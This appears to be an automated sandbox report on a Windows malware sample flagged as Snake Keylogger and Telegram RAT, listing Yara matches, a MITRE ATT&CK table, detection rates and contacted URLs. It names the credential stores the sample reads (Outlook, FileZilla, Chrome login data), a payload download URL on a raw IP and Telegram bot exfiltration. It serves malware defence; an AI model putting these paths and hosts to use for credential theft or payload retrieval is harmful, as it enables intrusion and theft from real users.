Source: Yara match	File source: 1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.4112570.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.435325565.0000000004112000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.431560806.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.435253070.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.429118422.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.605721974.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.430843529.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.430135696.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.4112570.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.40ea550.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.40ea550.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.4112570.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.435325565.0000000004112000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.431560806.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.435253070.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.429118422.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.605721974.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.430843529.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.430135696.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe PID: 6780, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe PID: 6444, type: MEMORYSTR

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Source: Yara match	File source: 1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.4112570.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.40ea550.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.40ea550.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.4112570.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.435325565.0000000004112000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.431560806.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.435253070.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.429118422.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.605721974.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.430843529.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.430135696.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe PID: 6780, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe PID: 6444, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.4112570.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.40ea550.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.40ea550.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.4112570.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.435325565.0000000004112000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.431560806.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.435253070.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.429118422.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.605721974.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.430843529.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.430135696.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.4112570.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.40ea550.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.40ea550.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.4112570.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.435325565.0000000004112000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.431560806.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.435253070.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.429118422.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.605721974.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.430843529.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.430135696.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe PID: 6780, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe PID: 6444, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Native API	Path Interception	111 Process Injection	1 Masquerading	2 OS Credential Dumping	1 Process Discovery	Remote Services	1 Email Collection	Exfiltration Over Other Network Medium	11 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Disable or Modify Tools	LSASS Memory	21 Virtualization/Sandbox Evasion	Remote Desktop Protocol	11 Archive Collected Data	Exfiltration Over Bluetooth	1 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	21 Virtualization/Sandbox Evasion	Security Account Manager	1 Application Window Discovery	SMB/Windows Admin Shares	2 Data from Local System	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	111 Process Injection	NTDS	1 Remote System Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	13 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	2 Obfuscated Files or Information	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	11 Software Packing	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 Timestomp	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	16%	Virustotal		Browse
SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	27%	ReversingLabs	ByteCode-MSIL.Downloader.Seraph

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
7.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.0.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.4.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.10.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.12.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.6.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.8.unpack	100%	Avira	TR/ATRAPS.Gen	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.fontbureau.comZi	0%	Avira URL Cloud	safe
http://www.fontbureau.comm~i	0%	Avira URL Cloud	safe
http://www.fontbureau.comcomdHi	0%	Avira URL Cloud	safe
https://freegeoip.app	0%	URL Reputation	safe
http://www.founder.com.cn/cnsofqxx	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cnthe	0%	Avira URL Cloud	safe
http://www.zhongyicts.com.cno.-x	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/Hi	0%	Avira URL Cloud	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://checkip.dyndns.org/	0%	URL Reputation	safe
http://www.carterandcone.comCo	0%	Avira URL Cloud	safe
http://checkip.dyndns.org/q	0%	URL Reputation	safe
http://45.137.22.163/fact_Sptqaevl.bmp	0%	Avira URL Cloud	safe
http://www.fontbureau.comHi	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/Y0	0%	URL Reputation	safe
https://freegeoip.app/xml/84.17.52.15	0%	Avira URL Cloud	safe
http://www.ascendercorp.com/typedesigners.html	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.carterandcone.como.	0%	URL Reputation	safe
http://www.fontbureau.com.TTF	0%	URL Reputation	safe
http://freegeoip.app	0%	URL Reputation	safe
http://www.zhongyicts.com.cnorm	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/Ai	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/	0%	URL Reputation	safe
http://www.fontbureau.comFwi	0%	Avira URL Cloud	safe
http://www.fontbureau.comcoma	0%	URL Reputation	safe
http://www.tiro.guw	0%	Avira URL Cloud	safe
http://www.carterandcone.comW	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/sdi	0%	Avira URL Cloud	safe
http://www.fontbureau.comitut	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/8hd	0%	Avira URL Cloud	safe
http://www.carterandcone.como.L	0%	Avira URL Cloud	safe
http://www.carterandcone.comr	0%	URL Reputation	safe
http://www.carterandcone.comp	0%	URL Reputation	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
http://www.fontbureau.comdHi	0%	Avira URL Cloud	safe
https://freegeoip.app4Wk	0%	Avira URL Cloud	safe
http://www.tiro.comduv	0%	Avira URL Cloud	safe
http://www.fontbureau.comcomF8hd	0%	Avira URL Cloud	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.founder.com.cn/cn/	0%	URL Reputation	safe
http://www.fontbureau.comce/li	0%	Avira URL Cloud	safe
http://www.fontbureau.comoitu	0%	URL Reputation	safe
https://freegeoip.app/xml/84.17.52.15x	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/jp/8hd	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/t	0%	URL Reputation	safe
http://www.zhongyicts.com.cnW	0%	Avira URL Cloud	safe
http://checkip.dyndns.orgD8Wk	0%	Avira URL Cloud	safe
http://www.carterandcone.com~	0%	Avira URL Cloud	safe
http://checkip.dyndns.org4Wk	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn)	0%	URL Reputation	safe
http://www.fontbureau.comI.TTFZi	0%	Avira URL Cloud	safe
http://www.carterandcone.comCoi	0%	Avira URL Cloud	safe
http://www.fontbureau.comF8hd	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cnQ	0%	URL Reputation	safe
http://www.zhongyicts.com.cnCo	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.carterandcone.comar	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/jp/li	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.carterandcone.com6	0%	Avira URL Cloud	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/Y0tr	0%	Avira URL Cloud	safe
http://www.carterandcone.com	0%	URL Reputation	safe
http://www.founder.com.cn/cnhkPs	0%	Avira URL Cloud	safe
http://www.sandoll.co.krs-c	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.carterandcone.comC	0%	URL Reputation	safe
http://www.founder.com.cn/cnw	0%	URL Reputation	safe
http://www.fontbureau.comB.TTF	0%	URL Reputation	safe
http://www.carterandcone.comTC1	0%	Avira URL Cloud	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://checkip.dyndns.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/li	0%	Avira URL Cloud	safe
https://freegeoip.app/xml/	0%	URL Reputation	safe
http://www.fontbureau.comF	0%	URL Reputation	safe
http://www.founder.com.cn/cn/7	0%	Avira URL Cloud	safe
http://www.carterandcone.comTC	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/jp/Ai	0%	Avira URL Cloud	safe
http://www.tiro.comn	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
freegeoip.app	188.114.97.7	true	false	unknown
checkip.dyndns.com	158.101.44.242	true	false	unknown
checkip.dyndns.org	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown
http://45.137.22.163/fact_Sptqaevl.bmp	false	Avira URL Cloud: safe	unknown
https://freegeoip.app/xml/84.17.52.15	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.fontbureau.comZi	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355923706.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355479066.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355787965.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355587469.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.356055521.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355735494.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.comm~i	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.362640132.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.362961626.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.437323044.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.362717209.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.362577996.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.363105723.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.362852283.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://api.telegram.org/bot	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.435325565.0000000004112000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.435253070.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000007.00000000.431560806.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
http://www.fontbureau.comcomdHi	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355070094.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355923706.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355479066.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355787965.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355587469.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355263828.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.354866721.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.356055521.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355370104.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355735494.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.354957925.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.356140272.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355132775.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://freegeoip.app	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000007.00000002.606537804.0000000003316000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cnsofqxx	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346883664.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346759481.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346639113.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.352949197.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.353874368.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.354300800.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.353305139.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	false		high
